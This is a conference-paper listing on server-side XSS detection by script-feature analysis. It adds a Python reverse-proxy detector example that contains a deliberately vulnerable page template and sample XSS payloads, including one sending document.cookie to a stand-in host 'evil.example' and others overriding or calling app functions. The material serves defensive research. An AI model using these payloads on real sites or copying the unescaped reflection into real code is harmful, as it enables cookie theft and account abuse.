XSS Attack Detection Approach Based on Scripts Features Analysis

  • Saoudi Lalia
  • Ammiche Sarah
Conference paper
Part of the Advances in Intelligent Systems and Computing book series (AISC, volume 746)

Abstract

Cross-Site Scripting (XSS) attacks are a type of injection vulnerability in modern Web applications that is exploited by injecting JavaScript code. A variety of defensive techniques now exist to protect web applications against XSS injection, but they still cannot fully detect attacks that inject benign-looking JavaScript, such as calls to the application's existing methods or the overriding of an existing method definition. Moreover, present server-side XSS detection systems require modification of the supervised application's source code. In this work we developed a server-side XSS detection approach based on the analysis of script features, which detects a wide range of injected scripts, whether clearly malicious scripts or legitimate-looking scripts that resemble the application's own benign scripts, without any modification of the application source code. Our approach is evaluated on three web applications. The experimental results show that it detects a wide range of XSS attacks.
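The abstract describes two classes of injected script that signature-based filters miss: a script that merely calls a function the application already defines, and a script that redefines one of the application's functions. The following added example, which is not the paper's implementation and not code from the authors, sketches how a reverse proxy can catch both without touching the application: it learns a per-page baseline of script feature vectors from a response rendered with no untrusted input, then compares every inline script in later responses against that baseline. The feature set (defined names, called names, external src, statement count, normalized length), the regex-based extraction, the constructed vulnerable page and the payloads are all hypothetical simplifications chosen to illustrate the idea.

```python
"""Added illustration: XSS detection by inline-script feature analysis at a
reverse proxy.  Hypothetical simplification, NOT the paper's implementation."""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# Keywords that the call/definition regexes below would otherwise mistake for names.
_KEYWORDS = {"if", "for", "while", "switch", "catch", "function", "return"}
_DEF_RE = re.compile(r"\bfunction\s+([A-Za-z_$][\w$]*)\s*\(")       # function f(
_ASSIGN_RE = re.compile(r"\b([A-Za-z_$][\w$]*)\s*=\s*function\b")   # f = function
_CALL_RE = re.compile(r"\b([A-Za-z_$][\w$]*)\s*\(")                 # f(


@dataclass(frozen=True)
class ScriptFeatures:
    src: Optional[str]     # external script URL, if any
    defined: frozenset     # function names this script (re)defines
    called: frozenset      # names it calls but does not define itself
    statements: int        # rough statement count (';' occurrences)
    length: int            # length of the whitespace-normalized body


class _ScriptCollector(HTMLParser):
    """Collects (src, body) for every <script> element in an HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[Optional[str], str]] = []
        self._src: Optional[str] = None
        self._buf: Optional[List[str]] = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._src, self._buf = dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append((self._src, "".join(self._buf)))
            self._buf = None


def collect_scripts(html: str) -> List[Tuple[Optional[str], str]]:
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    return p.scripts


def extract_features(src: Optional[str], body: str) -> ScriptFeatures:
    defined = set(_DEF_RE.findall(body)) | set(_ASSIGN_RE.findall(body))
    called = {n for n in _CALL_RE.findall(body) if n not in _KEYWORDS and n not in defined}
    return ScriptFeatures(src, frozenset(defined), frozenset(called),
                          body.count(";"), len(re.sub(r"\s+", "", body)))


def learn_baseline(trusted_html: str) -> List[ScriptFeatures]:
    """Profile the scripts of a page rendered with no untrusted input."""
    return [extract_features(s, b) for s, b in collect_scripts(trusted_html)]


def check_response(html: str, baseline: List[ScriptFeatures]) -> List[Tuple[str, List[str]]]:
    """Return (snippet, reasons) for every script that does not match the baseline."""
    known_defs = set().union(*(f.defined for f in baseline))
    unmatched, findings = list(baseline), []
    for src, body in collect_scripts(html):
        feat = extract_features(src, body)
        if feat in unmatched:              # feature vector equal to a legitimate script
            unmatched.remove(feat)
            continue
        reasons = []
        if feat.defined & known_defs:      # benign-looking override of an app function
            reasons.append("redefines existing function(s): " + ", ".join(sorted(feat.defined & known_defs)))
        if feat.called & known_defs:       # benign-looking call of an app function
            reasons.append("calls existing function(s): " + ", ".join(sorted(feat.called & known_defs)))
        if not reasons:
            reasons.append("script absent from baseline")
        findings.append((src or re.sub(r"\s+", " ", body).strip()[:50], reasons))
    return findings


# Constructed sample page of the supervised application; the comment is reflected
# unescaped, which is the XSS bug the proxy is watching for.
_TEMPLATE = """<html><body>
<script src="/static/app.js"></script>
<script>
function validate(f) { return f.user.value.length > 0; }
function deleteAccount() { fetch('/account', {method: 'DELETE'}); }
</script>
<form onsubmit="return validate(this)"><input name="user"></form>
<button onclick="deleteAccount()">Delete</button>
<div class="comment">%s</div>
</body></html>"""


def render_page(comment: str) -> str:
    return _TEMPLATE % comment


BASELINE = learn_baseline(render_page(""))   # learned once, from trusted rendering

PAYLOADS = {                                  # constructed sample injections
    "classic":  "<script>location='//evil.example/?c='+document.cookie</script>",
    "call":     "<script>deleteAccount();</script>",
    "override": "<script>function validate(f) { return true; }</script>",
    "assign":   "<script>validate = function () { return true; };</script>",
}

if __name__ == "__main__":
    print("benign:", check_response(render_page("nice post"), BASELINE))
    for name, payload in PAYLOADS.items():
        print(name + ":", check_response(render_page(payload), BASELINE))
```

The "call" and "override" payloads contain nothing a blacklist of dangerous tokens would object to, which is exactly the gap the abstract points at; they are caught only because the proxy knows which scripts, and which function names, the unmodified page legitimately carries. A real deployment would key the baseline by route, tolerate the application's own dynamic scripts (e.g. by masking nonces and session tokens before feature extraction), and treat any finding as a block-and-alert decision rather than a log line.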

Keywords

XSS attack · Feature extraction · Web security · Reverse proxy · Cross-site scripting

Copyright information

© Springer International Publishing AG, part of Springer Nature 2018

Authors and Affiliations

Computer Science Department, Mohamed Boudiaf University, M'Sila, Algeria